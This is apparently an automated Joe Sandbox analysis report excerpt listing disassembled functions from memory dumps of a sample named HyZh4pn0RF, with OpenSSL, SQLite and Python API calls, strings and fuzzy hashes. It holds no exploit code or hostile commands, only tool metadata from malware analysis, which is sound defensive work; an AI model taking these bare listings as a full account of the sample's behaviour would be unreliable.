ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB7564AC

Strings

do_ssl3_write, xrefs: 00007FFBAB755955, 00007FFBAB755A23, 00007FFBAB755B27, 00007FFBAB755B63, 00007FFBAB755CB3, 00007FFBAB755EF7, 00007FFBAB75649E
U, xrefs: 00007FFBAB755A16
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFBAB755961, 00007FFBAB755A2F, 00007FFBAB755B33, 00007FFBAB755B6F, 00007FFBAB755CBF, 00007FFBAB755F03, 00007FFBAB7564A5

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: R_new$R_set_debug$X_get0_md$D_get_sizeR_get_modeX_get0_cipherX_get_iv_length
String ID: ..\s\ssl\record\rec_layer_s3.c$U$do_ssl3_write
API String ID: 2155623385-3398879041
Opcode ID: 41a00918063dcb1acd3d550392ff3b967aa5101fe27bfa6b86cdda5c14834b91
Instruction ID: c23f67a9386614f8fee94a529b017b9cf57a8f361c349dd272617e18a0751be3
Opcode Fuzzy Hash: 41a00918063dcb1acd3d550392ff3b967aa5101fe27bfa6b86cdda5c14834b91
Instruction Fuzzy Hash: 62729FB2B0A68281EB629F35D444BB923A0FB45784F548236DE6D47BB9DFBDE540C700

Function 00007FFBAB72CB40 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CBA4
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CBC6
CRYPTO_free_ex_data.LIBCRYPTO-3 ref: 00007FFBAB72CBF8
OPENSSL_LH_free.LIBCRYPTO-3 ref: 00007FFBAB72CC01
X509_STORE_free.LIBCRYPTO-3 ref: 00007FFBAB72CC0A
CTLOG_STORE_free.LIBCRYPTO-3 ref: 00007FFBAB72CC16
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FFBAB72CC1F
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FFBAB72CC28
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FFBAB72CC31
OPENSSL_sk_pop_free.LIBCRYPTO-3 ref: 00007FFBAB72CC50
OPENSSL_sk_pop_free.LIBCRYPTO-3 ref: 00007FFBAB72CC63
OPENSSL_sk_pop_free.LIBCRYPTO-3 ref: 00007FFBAB72CC76
OPENSSL_sk_free.LIBCRYPTO-3 ref: 00007FFBAB72CC89
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CCB6
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CCCF
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CCE8
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CD01
CRYPTO_secure_free.LIBCRYPTO-3 ref: 00007FFBAB72CD1A
EVP_MD_get0_provider.LIBCRYPTO-3 ref: 00007FFBAB72CD2E
EVP_MD_free.LIBCRYPTO-3 ref: 00007FFBAB72CD3B
EVP_MD_get0_provider.LIBCRYPTO-3 ref: 00007FFBAB72CD4F
EVP_MD_free.LIBCRYPTO-3 ref: 00007FFBAB72CD5C
EVP_CIPHER_get0_provider.LIBCRYPTO-3 ref: 00007FFBAB72CD7B
EVP_CIPHER_free.LIBCRYPTO-3 ref: 00007FFBAB72CD88
EVP_MD_get0_provider.LIBCRYPTO-3 ref: 00007FFBAB72CDAF
EVP_MD_free.LIBCRYPTO-3 ref: 00007FFBAB72CDBC
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CDF9
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CE17
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CE35
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CE5E
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CE77
CRYPTO_THREAD_lock_free.LIBCRYPTO-3 ref: 00007FFBAB72CE83
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CE9C
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB72CEB1

Strings

..\s\ssl\ssl_lib.c, xrefs: 00007FFBAB72CB97, 00007FFBAB72CBB0, 00007FFBAB72CCA9, 00007FFBAB72CCC2, 00007FFBAB72CCDB, 00007FFBAB72CCF4, 00007FFBAB72CD0D, 00007FFBAB72CDE8, 00007FFBAB72CE05, 00007FFBAB72CE23, 00007FFBAB72CE51, 00007FFBAB72CE6A, 00007FFBAB72CE8F, 00007FFBAB72CEA7

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: O_free$L_sk_free$D_freeD_get0_providerL_sk_pop_free$E_free$D_lock_freeH_freeO_free_ex_dataO_secure_freeR_freeR_get0_providerX509_
String ID: ..\s\ssl\ssl_lib.c
API String ID: 234229340-1080266419
Opcode ID: da6757feed0cf92b36d83c55165aa2a6c09c6b1f72b48f5c804d2acfe702e739
Instruction ID: 400d0d940be7949a0a66936f4f453e6d717838c00729fde14f26295e5edf3c8c
Opcode Fuzzy Hash: da6757feed0cf92b36d83c55165aa2a6c09c6b1f72b48f5c804d2acfe702e739
Instruction Fuzzy Hash: CD9178A2B1A64380EB43AF71D5912F83711EF85F84F049036DE2D4B6BADEADE541C350

Function 00007FFBAB758810 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CRYPTO_malloc.LIBCRYPTO-3 ref: 00007FFBAB7588B1
CRYPTO_free.LIBCRYPTO-3 ref: 00007FFBAB75895A
CRYPTO_malloc.LIBCRYPTO-3 ref: 00007FFBAB758975
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB7589E4
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB7589F1

Strings

ssl3_setup_write_buffer, xrefs: 00007FFBAB7589CE
ssl3_setup_read_buffer, xrefs: 00007FFBAB7588C0
..\s\ssl\record\ssl3_buffer.c, xrefs: 00007FFBAB75883B

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: O_malloc$O_freeR_newR_set_debug
String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_read_buffer$ssl3_setup_write_buffer
API String ID: 2137838121-2302522825
Opcode ID: aff729ce5dbbfe64035964e2718b536c285c0b381943e99e5fe4dae49f62b85e
Instruction ID: f32ddfcf9d137356d5d5322755bb3c119b15f012568d7c3e124afe1abada13b6
Opcode Fuzzy Hash: aff729ce5dbbfe64035964e2718b536c285c0b381943e99e5fe4dae49f62b85e
Instruction Fuzzy Hash: 3B51D1B2B05B8182EB129B25E844BA977E4FB84B88F498535DE6C577B5CF7CD441C300

Function 00007FFBAA599060 Relevance: 14.0, APIs: 6, Strings: 3, Instructions: 517
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA59913B
memset.VCRUNTIME140 ref: 00007FFBAA5991AE
memcpy.VCRUNTIME140 ref: 00007FFBAA599215
memcpy.VCRUNTIME140 ref: 00007FFBAA599237
memcpy.VCRUNTIME140 ref: 00007FFBAA5993FF
memcpy.VCRUNTIME140 ref: 00007FFBAA599428

Strings

immutable, xrefs: 00007FFBAA5995BD
-journal, xrefs: 00007FFBAA599407
nolock, xrefs: 00007FFBAA599586

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID: -journal$immutable$nolock
API String ID: 438689982-4201244970
Opcode ID: 380a9d1c4d3eb6c0978f43b2501ad74b92e3df7218d393616c9a4ef1ed7755b3
Instruction ID: 505eaf89ec9b79b59a3132912262b26e49bf6b53b2c50c77395576157aca9511
Opcode Fuzzy Hash: 380a9d1c4d3eb6c0978f43b2501ad74b92e3df7218d393616c9a4ef1ed7755b3
Instruction Fuzzy Hash: 7C3291A2A0A682C6EB528F35D88037D37A8FB45B94F085274CE5D0B7A4DF3DE446C724

Function 00007FFBAA5FB060 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5FB608

Strings

misuse, xrefs: 00007FFBAA5FB0D2
unopened, xrefs: 00007FFBAA5FB0AD
2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5FB0C5
API call with %s database connection pointer, xrefs: 00007FFBAA5FB0B4
invalid, xrefs: 00007FFBAA5FB0A2
%s at line %d of [%.10s], xrefs: 00007FFBAA5FB0DE
NULL, xrefs: 00007FFBAA5FB08D

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 3510742995-3762325461
Opcode ID: 5322917dae406af972ceb5c173cc7198a97aeeb3d07e19412ac7cbf5cc1b76b1
Instruction ID: 08caeefa14be0c43185aa7b7f50e0645863c1143325f4fa9fedc23b87da07b34
Opcode Fuzzy Hash: 5322917dae406af972ceb5c173cc7198a97aeeb3d07e19412ac7cbf5cc1b76b1
Instruction Fuzzy Hash: 0702DFA1A0AA42C9EB128B35E45037E77A9FF56B84F090171DE4E07695DF3DE44B8324

Function 00007FFBAA602BB0 Relevance: 9.4, APIs: 3, Strings: 3, Instructions: 374COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA602C1F
memcpy.VCRUNTIME140 ref: 00007FFBAA602E30
memcpy.VCRUNTIME140 ref: 00007FFBAA602EE0

Strings

database schema is locked: %s, xrefs: 00007FFBAA602D86
out of memory, xrefs: 00007FFBAA602C9B
statement too long, xrefs: 00007FFBAA602DE6

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 438689982-1046679716
Opcode ID: 5ed36e81426d4dda266e1e2b72bbbc4cce9bbd62fb343d6ed1371e91b3143b91
Instruction ID: 6a6f212e1924c0890f3f8253c8c58512ff56e7682ce96d4dc284a5a6ce88bb47
Opcode Fuzzy Hash: 5ed36e81426d4dda266e1e2b72bbbc4cce9bbd62fb343d6ed1371e91b3143b91
Instruction Fuzzy Hash: 6CF1C4A2A0A781D6EB268B39D8003BA77A8FF45F84F049075DF4D17695DE7CE5828B10

Function 00007FFBAB758A90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CRYPTO_malloc.LIBCRYPTO-3 ref: 00007FFBAB758B20
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB758B2F
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB758B47

Strings

ssl3_setup_read_buffer, xrefs: 00007FFBAB758B34
..\s\ssl\record\ssl3_buffer.c, xrefs: 00007FFBAB758B09, 00007FFBAB758B40

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: O_mallocR_newR_set_debug
String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_read_buffer
API String ID: 4191474876-3943321158
Opcode ID: 5fff987995410eebad3e490ee413e981b85b0ab1ac7e47f40a62e1e917fad067
Instruction ID: 93aa34b8ed72688cdcfafb6e79827403f2a6d86bfaff2cf54b5c3af9dd9e5977
Opcode Fuzzy Hash: 5fff987995410eebad3e490ee413e981b85b0ab1ac7e47f40a62e1e917fad067
Instruction Fuzzy Hash: 38210AB2F1974142FB829B38E8417A852A0F748740F444135EE7C57BB5DF6CD8918700

Function 00007FFBAA5A1630 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 593stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA5A1698
memcpy.VCRUNTIME140 ref: 00007FFBAA5A17F0

Strings

:memory:, xrefs: 00007FFBAA5A168E

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpystrcmp
String ID: :memory:
API String ID: 4075415522-2920599690
Opcode ID: 8e7fe652c53ecfd9e6950fd39503f048c40fb94f5715b78c0ddff847ae2a71d4
Instruction ID: 8c647ecd35fdcfc79606e9b0c1cf2d07335f4329c47ddb429d62c4da9c4c7757
Opcode Fuzzy Hash: 8e7fe652c53ecfd9e6950fd39503f048c40fb94f5715b78c0ddff847ae2a71d4
Instruction Fuzzy Hash: 93427DB2E0EB82C2EB668B35D45837937A8BB56B84F045176DE4D43690DF3CE482C724

Function 00007FFBAA591490 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFBAA5914B5

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
Instruction ID: 346437f8312cfe96206fa3bcdffc91edbedfad0757d0d7de2913c30e0df0ce3e
Opcode Fuzzy Hash: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
Instruction Fuzzy Hash: 6BA10BE4D0FB16C1FE978B79E8902382399BF56F84F1815B5CD0E0A390DF6CE4529A64

Function 00007FFBAB711C1C Relevance: 70.6, APIs: 37, Strings: 3, Instructions: 617COMMON

Download Yara Rule

APIs

ERR_new.LIBCRYPTO-3 ref: 00007FFBAB756A29
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB756C60
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB756C78
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB7573E3

Strings

SSL alert number %d, xrefs: 00007FFBAB7571C8
ssl3_read_bytes, xrefs: 00007FFBAB756C65, 00007FFBAB756DE3, 00007FFBAB756FCA, 00007FFBAB757106, 00007FFBAB757133, 00007FFBAB75716B, 00007FFBAB7571A5, 00007FFBAB757206, 00007FFBAB757233, 00007FFBAB75729C, 00007FFBAB7572CE, 00007FFBAB757311, 00007FFBAB75733D, 00007FFBAB7573D5
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFBAB756C71, 00007FFBAB756DEF, 00007FFBAB756FD6, 00007FFBAB757112, 00007FFBAB75713F, 00007FFBAB757177, 00007FFBAB7571B1, 00007FFBAB757212, 00007FFBAB75723F, 00007FFBAB7572A8, 00007FFBAB7572D5, 00007FFBAB75731D, 00007FFBAB757344, 00007FFBAB7573DC

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: R_newR_set_debug
String ID: ..\s\ssl\record\rec_layer_s3.c$SSL alert number %d$ssl3_read_bytes
API String ID: 193678381-3615793073
Opcode ID: 108b0c7aba75271675a052604f79180b415d65b67826a1dd14ea7712663ba608
Instruction ID: a42e92c97c850c6d9138b475f34d9f3da8ec16eb52d9ca3ee7e6d3af244caf21
Opcode Fuzzy Hash: 108b0c7aba75271675a052604f79180b415d65b67826a1dd14ea7712663ba608
Instruction Fuzzy Hash: 5D5280F2B0A68285EB639B35D540BBA76A1EB41754F54C235CE7D066B6CFBDE881C300

Function 00007FFBAB6A4640 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyImport_ImportModuleLevelObject.PYTHON312 ref: 00007FFBAB6A4671
PyObject_GetAttr.PYTHON312 ref: 00007FFBAB6A46BD
PyUnicode_FromFormat.PYTHON312 ref: 00007FFBAB6A46DD
PyObject_GetItem.PYTHON312 ref: 00007FFBAB6A46F5
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A470C
PyDict_SetItem.PYTHON312 ref: 00007FFBAB6A472D
PyObject_SetItem.PYTHON312 ref: 00007FFBAB6A4735
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A474B
PyErr_Clear.PYTHON312 ref: 00007FFBAB6A477B
PyModule_GetFilenameObject.PYTHON312 ref: 00007FFBAB6A4784
PyUnicode_FromFormat.PYTHON312 ref: 00007FFBAB6A47A2
PyErr_SetImportError.PYTHON312 ref: 00007FFBAB6A47B9
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A47CD
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A47E1
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A47F5

Strings

%U.%U, xrefs: 00007FFBAB6A46D3
cannot import name %R from %R (%S), xrefs: 00007FFBAB6A4792

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$ItemObject_$Err_FormatFromImportObjectUnicode_$AttrClearDict_ErrorFilenameImport_LevelModuleModule_
String ID: %U.%U$cannot import name %R from %R (%S)
API String ID: 3630264407-438398067
Opcode ID: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
Instruction ID: 3946c8cfb8972a6e1dc34bf6ca3d16f9badde8af89e249253012d532481ef80a
Opcode Fuzzy Hash: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
Instruction Fuzzy Hash: 7D514CB6A0AA8281EA568F79EC147A9F3B0BB45B95F44E035CE6E03764DF3CE045C700

Function 00007FFBAB76E240 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

read_state_machine, xrefs: 00007FFBAB76E4CD, 00007FFBAB76E50A, 00007FFBAB76E532, 00007FFBAB76E5A5
..\s\ssl\statem\statem.c, xrefs: 00007FFBAB76E4D4, 00007FFBAB76E511, 00007FFBAB76E53E, 00007FFBAB76E5B1

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem.c$read_state_machine
API String ID: 0-3323778802
Opcode ID: 14377edc59a60446f09f780bfe0d0aa6ceb5de1d18d0f26ea132c90706a724b0
Instruction ID: 2748151858f8e4093173da4eb677bd13ab9133438ba114c68dfb53dc2517a7ea
Opcode Fuzzy Hash: 14377edc59a60446f09f780bfe0d0aa6ceb5de1d18d0f26ea132c90706a724b0
Instruction Fuzzy Hash: 3F91B2B2A0A64685EB529F35E8503B92751EF40B48F94C03AEE2D477B9DFBDE445C320

Function 00007FFBAB738B00 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ERR_new.LIBCRYPTO-3 ref: 00007FFBAB738B30
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB738B48
ERR_set_error.LIBCRYPTO-3 ref: 00007FFBAB738B59
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB738B75
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB738B8D
ERR_set_error.LIBCRYPTO-3 ref: 00007FFBAB738B9E

Strings

..\s\ssl\ssl_lib.c, xrefs: 00007FFBAB738B41, 00007FFBAB738B86, 00007FFBAB738BD3
ssl_write_internal, xrefs: 00007FFBAB738B35, 00007FFBAB738B7A, 00007FFBAB738BC7

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

